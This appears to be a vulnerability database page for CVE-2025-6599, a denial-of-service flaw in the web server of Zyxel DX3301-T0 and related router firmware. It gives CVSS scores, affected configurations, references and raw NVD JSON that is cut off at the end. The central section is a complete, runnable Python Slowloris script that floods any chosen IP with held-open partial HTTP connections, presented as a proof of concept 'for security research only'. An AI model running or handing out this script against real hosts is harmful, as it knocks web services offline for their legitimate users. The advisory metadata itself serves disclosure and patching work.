CVE-2025-6599

Description

An uncontrolled resource consumption vulnerability in the web server of Zyxel DX3301-T0 firmware version 5.50(ABVY.6.3)C0 and earlier could allow an attacker to perform Slowloris‑style denial‑of‑service (DoS) attacks. Such attacks may temporarily block legitimate HTTP requests and partially disrupt access to the web management interface, while other networking services remain unaffected.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:zyxel:lte3301-plus_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:lte3301-plus:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:zyxel:nr5103_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:nr5103:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:zyxel:nr5103e_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:nr5103e:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:zyxel:nr5309_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:nr5309:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:zyxel:nr7302_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:zyxel:nr7302:-:*:*:*:*:*:*:* - NOT VULNERABLE

Zyxel DX3301-T0 firmware <= 5.50(ABVY.6.3)C0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-6599 PoC - Slowloris Attack on Zyxel DX3301-T0
This PoC demonstrates the uncontrolled resource consumption vulnerability
"""
import socket
import time
import random
import argparse

def slowloris_attack(target_ip, target_port=80, num_connections=200, delay=15):
    """
    Perform Slowloris attack to exhaust HTTP server connections
    
    Args:
        target_ip: Target device IP address
        target_port: Target web server port (default: 80)
        num_connections: Number of concurrent connections to maintain
        delay: Delay in seconds between header sends
    """
    print(f"[*] Starting Slowloris attack on {target_ip}:{target_port}")
    print(f"[*] Target: Zyxel DX3301-T0 Web Server")
    print(f"[*] Establishing {num_connections} connections...")
    
    sockets = []
    
    # Create initial connections
    for i in range(num_connections):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(4)
            sock.connect((target_ip, target_port))
            
            # Send partial HTTP request
            sock.send(f"GET / HTTP/1.1\r\n".encode())
            sock.send(f"Host: {target_ip}\r\n".encode())
            sock.send(f"User-Agent: Mozilla/5.0\r\n".encode())
            
            sockets.append(sock)
            print(f"[+] Connection {i+1}/{num_connections} established")
        except Exception as e:
            print(f"[-] Connection {i+1} failed: {e}")
    
    print(f"[*] {len(sockets)} connections established")
    print(f"[*] Sending keep-alive headers every {delay} seconds...")
    
    # Keep connections alive by sending partial headers
    try:
        while True:
            for sock in sockets:
                try:
                    # Send another partial header
                    sock.send(f"X-a: {random.randint(1, 5000)}\r\n".encode())
                except:
                    pass
            print(f"[*] Sent keep-alive headers to {len(sockets)} connections")
            time.sleep(delay)
    except KeyboardInterrupt:
        print("\n[*] Attack stopped by user")
    finally:
        for sock in sockets:
            sock.close()
        print("[*] All connections closed")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-6599 Slowloris PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('--port', type=int, default=80, help='Target port (default: 80)')
    parser.add_argument('--connections', type=int, default=200, help='Number of connections')
    parser.add_argument('--delay', type=int, default=15, help='Delay between headers')
    
    args = parser.parse_args()
    slowloris_attack(args.target, args.port, args.connections, args.delay)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-6599
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-6599
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-6599/
[4] VulDB https://vuldb.com/cve/CVE-2025-6599
[5] https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-uncontrolled-resource-consumption-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-11-18-2025

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-6599", "sourceIdentifier": "[email protected]", "published": "2025-11-18T02:15:45.210", "lastModified": "2025-12-16T21:19:59.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An uncontrolled resource consumption vulnerability in the web server of Zyxel DX3301-T0 firmware version 5.50(ABVY.6.3)C0 and earlier could allow an attacker to perform Slowloris‑style denial‑of‑service (DoS) attacks. Such attacks may temporarily block legitimate HTTP requests and partially disrupt access to the web management interface, while other networking services remain unaffected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:lte3301-plus_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.00\\(abqu.7\\)c0", "matchCriteriaId": "39C11636-A21A-4CE5-8CF9-8F311E7EE237"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:lte3301-plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "4814D3A1-C0D4-4573-AD77-C2EE7AC11CB4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:nr5103_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.19\\(abyc.8\\)c0", "matchCriteriaId": "1A40FCA4-B934-4F48-B7ED-47C68FEA1C28"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:nr5103:-:*:*:*:*:*:*:*", "matchCriteriaId": "C821C282-A1E3-4E31-A0C3-96936A4D90CB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:nr5103e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.00\\(acdj.1\\)c0", "matchCriteriaId": "E6E757DA-008B-442B-A17A-E2634F7CBFF1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:nr5103e:-:*:*:*:*:*:*:*", "matchCriteriaId": "97C7B929-E318-4E17-8AF9-160C8613132D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:nr5309_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.00\\(ackp.1\\)b3", "matchCriteriaId": "1C5C782B-2767-42FE-BDCA-6A444EA6A582"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:nr5309:-:*:*:*:*:*:*:*", "matchCriteriaId": "3D102872-D330-40F9-A625-ACB7FC2EA7EE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:nr7302_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.00\\(acha.5\\)c0", "matchCriteriaId": "8BE1E950-1545-4846-96A2-DFAF04F7DF16"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:nr7302:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1793FC4-BA0C-4CFC-93BB-3BCD899E7F23"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:nr7303_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.00\\(acei.1\\)c0", "matchCriteriaId": "7E40093F-9606-462E-846C-52BC1CE3AE34"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:nr7303:-:*:*:*:*:*:*:*", "matchCriteriaId": "9CE64F27-D4A3-40B4-A117-3F5B2B140801"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:nebula_fwa505_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.19\\(acko.0\\)c0", "matchCriteriaId": "E8105344-6F49-4B09-AAF1-87ED800D0541"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:nebula_fwa505:-:*:*:*:*:*:*:*", "matchCriteriaId": "5052039B-5273-4CDF-AFA5-609855801D24"}]}]}, {"operator": "AND", ... (truncated)